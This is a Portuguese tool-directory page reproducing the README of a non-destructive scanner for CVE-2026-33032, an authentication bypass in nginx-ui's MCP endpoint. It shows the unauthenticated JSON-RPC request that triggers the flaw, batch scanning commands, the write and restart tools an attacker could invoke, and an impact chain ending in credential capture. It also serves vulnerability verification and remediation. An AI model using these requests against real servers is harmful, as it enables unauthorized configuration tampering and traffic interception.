Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2026-33032-scanner — Scanner de vulnerabilidades não destrutivo para bypass de autenticação do endpoint MCP do Nginx-UI (CVE-2026-33032) | Kitploit
Ferramentas/GitHubGitHub/twinson333/cve-2026-33032-scanner
Scanners de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoAutenticaçãoSegurança de API
GitHubtwinson333/cve-2026-33032-scanner

cve-2026-33032-scanner

Scanner de vulnerabilidades não destrutivo para bypass de autenticação do endpoint MCP do Nginx-UI (CVE-2026-33032)

Ver Repositório
32há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Scanner CVE-2026-33032

Scanner de vulnerabilidade não destrutivo para bypass de autenticação do endpoint MCP do Nginx-UI

Visão Geral da Vulnerabilidade

CVE-2026-33032 é uma vulnerabilidade de bypass de autenticação na integração Model Context Protocol (MCP) do nginx-ui. O endpoint /mcp_message não possui middleware de autenticação, embora forneça acesso a todas as ferramentas MCP, permitindo que atacantes remotos:

  • Leiam configurações e status do nginx
  • Criem/modifiquem/excluam arquivos de configuração do nginx
  • Reiniciem ou recarreguem o serviço nginx
  • Exfiltrem dados sensíveis de configuração
  • Injetem configurações maliciosas para interceptação de tráfego

Causa Raiz

  1. Assimetria de Autenticação: O endpoint /mcp exige autenticação, mas /mcp_message não:

    root@kitploit:~
    r.Any("/mcp", middleware.IPWhiteList(), middleware.AuthRequired(), ...)
    r.Any("/mcp_message", middleware.IPWhiteList(), ...)  // AuthRequired() ausente
    
  • Lista de IPs Permitidos Fail-Open: A lista de IPs permitidos padrão é vazia, o que o middleware trata como "permitir todos"

  • Ambos os Endpoints Compartilham Handler: Ambos roteiam para o mesmo mcp.ServeHTTP() que processa todas as invocações de ferramentas MCP

  • Recursos do Scanner

    ✅ Teste não destrutivo - Usa apenas ferramentas MCP somente leitura
    ✅ Fingerprinting abrangente - Identifica instalações nginx-ui
    ✅ Prova de conceito segura - Nenhuma alteração de configuração é feita
    ✅ Varredura em lote - Processa múltiplos alvos a partir de arquivo
    ✅ Relatórios detalhados - Saída JSON para integração

    Instalação

    root@kitploit:~
    # Clone ou baixe o scanner
    git clone https://github.com/Twinson333/cve-2026-33032-scanner.git
    cd cve-2026-33032
    chmod +x cve-2026-33032-scanner.py
    
    # Instale as dependências (se necessário)
    pip3 install requests
    

    Uso

    Varredura Básica

    root@kitploit:~
    # Varre um único alvo
    python3 cve-2026-33032-scanner.py -u http://target.com:9000
    
    # Varre com saída detalhada
    python3 cve-2026-33032-scanner.py -u https://nginx-ui.example.com -v
    
    # Timeout personalizado
    python3 cve-2026-33032-scanner.py -u http://192.168.1.100:9000 -t 15
    

    Varredura em Lote

    root@kitploit:~
    # Varre múltiplos alvos a partir de arquivo
    python3 cve-2026-33032-scanner.py -f targets.txt
    
    # Com saída detalhada e relatório JSON
    python3 cve-2026-33032-scanner.py -f targets.txt -v -o results.json
    
    #Burp Pingback
    python3 cve-2026-33032-scanner.py -u http://target.com:9000 --collaborator abc123.burpcollaborator.net
    

    Formato do Arquivo de Alvos

    root@kitploit:~
    # targets.txt - uma URL por linha
    http://192.168.1.100:9000
    https://nginx-ui.corp.com
    http://10.0.0.50:9000
    

    Como Funciona

    O scanner executa um processo de detecção em múltiplas etapas:

    Etapa 1: Fingerprinting

    Verifica endpoints comuns do nginx-ui para identificar a instalação:

    • /api/info - Informações de versão
    • /login - Página de login
    • /api/auth/login - Endpoint de autenticação
    • /mcp e /mcp_message - Endpoints MCP

    Etapa 2: Verificação de Autenticação

    Testa o endpoint /mcp para verificar se ele exige autenticação adequadamente (linha de base)

    Etapa 3: Exploração da Vulnerabilidade

    Tenta chamadas de ferramentas MCP não destrutivas via /mcp_message SEM autenticação:

    1. nginx_status (mais seguro) - Lê o status do processo nginx
    2. nginx_config_list - Lista arquivos de configuração
    3. nginx_config_base_path - Obtém o caminho do diretório de configuração

    Se qualquer ferramenta for bem-sucedida sem autenticação, a vulnerabilidade é confirmada.

    Ferramentas MCP Seguras Utilizadas

    O scanner invoca apenas ferramentas MCP somente leitura:

    FerramentaDescriçãoImpacto
    nginx_statusLê o status do serviço nginxSem alterações
    nginx_config_listLista arquivos de configuraçãoSem alterações
    nginx_config_base_pathObtém o caminho do diretório de configuraçãoSem alterações

    Ferramentas explicitamente evitadas:

    • nginx_config_add - Criaria arquivos
    • nginx_config_modify - Alteraria configurações
    • restart_nginx / reload_nginx - Interrupção do serviço
    • nginx_config_enable - Alteraria configurações ativas

    Exemplos de Saída

    Alvo Vulnerável

    root@kitploit:~
    [+] nginx-ui detectado: 'nginx-ui' encontrado em /login
    [+] Endpoint /mcp devidamente protegido
    
    [*] Testando endpoint /mcp_message (CVE-2026-33032)...
      [*] Tentando ferramenta: nginx_status - Ler status do nginx (mais seguro)
          Status: 200
    
    ======================================================================
    [!] VULNERÁVEL a CVE-2026-33032
    ======================================================================
    Prova: nginx_status executado com sucesso sem autenticação
    

    Alvo Protegido

    root@kitploit:~
    [+] nginx-ui detectado: Endpoint de versão acessível
    [+] Endpoint /mcp devidamente protegido
    
    [*] Testando endpoint /mcp_message (CVE-2026-33032)...
      [*] Tentando ferramenta: nginx_status - Ler status do nginx (mais seguro)
          Status: 401
          Autenticação exigida (protegido) ✓
    
    [+] NÃO vulnerável - endpoint exige autenticação
    

    Remediação

    Se a vulnerabilidade for confirmada:

    1. Correção Imediata: Adicione middleware de autenticação ao /mcp_message:

      root@kitploit:~
      r.Any("/mcp_message", middleware.IPWhiteList(), middleware.AuthRequired(),
          func(c *gin.Context) {
              mcp.ServeHTTP(c)
          })
      
    2. Defesa em Profundidade:

      • Configure a lista de IPs permitidos para negar-tudo por padrão
      • Restrinja os endpoints MCP apenas ao localhost se acesso externo não for necessário
      • Implemente limitação de taxa nos endpoints MCP
    3. Atualização: Atualize para a versão corrigida do nginx-ui quando disponível

    Divulgação Responsável

    Esta ferramenta foi projetada para:

    • ✅ Programas de bug bounty
    • ✅ Testes de penetração autorizados
    • ✅ Pesquisa de segurança com permissão
    • ✅ Validação de vulnerabilidades antes da divulgação

    NÃO use esta ferramenta em sistemas que você não possui ou para os quais não tem permissão explícita de teste.

    Dicas para Bug Bounty

    Ao relatar esta vulnerabilidade:

    1. Severidade: Crítica (CVSS 9.8+)

      • Acessível pela rede
      • Nenhuma autenticação exigida
      • Comprometimento completo do sistema
      • Exfiltração + modificação de configuração
    2. Prova: Inclua a saída do scanner mostrando invocação bem-sucedida de ferramenta MCP sem autenticação

    3. Cadeia de Impacto:

      • Acesso não autenticado → Leitura de configuração → Topologia do backend revelada
      • Escrita de configuração → Injeção de proxy malicioso → Captura de credenciais
      • Reinício do nginx → Interrupção do serviço → DoS
    4. PoC Seguro: Use apenas as ferramentas somente leitura (nginx_status, nginx_config_list)

    Detalhes Técnicos

    Formato de Invocação de Ferramenta MCP

    root@kitploit:~
    POST /mcp_message HTTP/1.1
    Content-Type: application/json
    
    {
      "jsonrpc": "2.0",
      "method": "tools/call",
      "params": {
        "name": "nginx_status",
        "arguments": {}
      },
      "id": 1
    }
    

    Resposta Bem-Sucedida

    root@kitploit:~
    {
      "jsonrpc": "2.0",
      "result": {
        "content": [
          {
            "type": "text",
            "text": "nginx está em execução (PID: 1234)"
          }
        ]
      },
      "id": 1
    }
    

    Resposta Protegida

    root@kitploit:~
    HTTP/1.1 401 Unauthorized
    {
      "error": "autenticação exigida"
    }
    

    Referências

    • CVE: CVE-2026-33032
    • Afetado: nginx-ui (versões com integração MCP)
    • CVSS: 9.8 (Crítica)
    • CWE: CWE-306 (Autenticação Ausente para Função Crítica)

    Licença

    Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizado.

    Autor

    Antony Esthak Twinson @ Cyber Tamarin
    Pesquisador de Segurança | Caçador de Bug Bounty
    Especializado em Segurança de Aplicações Web e Pesquisa de Vulnerabilidades


    Aviso Legal: Este scanner realiza apenas testes não destrutivos. Sempre obtenha autorização adequada antes de testar qualquer sistema.

    Baixar ferramenta